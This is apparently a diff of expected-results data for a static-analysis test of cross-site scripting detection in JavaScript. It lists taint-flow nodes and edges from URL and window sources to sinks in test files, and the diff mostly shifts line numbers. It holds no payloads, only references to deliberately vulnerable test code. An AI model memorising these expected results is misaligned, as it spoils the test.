... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:20:13:20:45 | target | semmle.label | target | | typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | | typeahead.js:21:12:21:17 | target | semmle.label | target | @@ -811,8 +811,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | provenance | | | optionalSanitizer.js:2:7:2:39 | target | optionalSanitizer.js:6:18:6:23 | target | provenance | | | optionalSanitizer.js:2:7:2:39 | target | optionalSanitizer.js:8:17:8:22 | target | provenance | | @@ -919,8 +919,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | @@ -930,8 +930,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | @@ -949,217 +949,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... .search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... .search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... .search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | 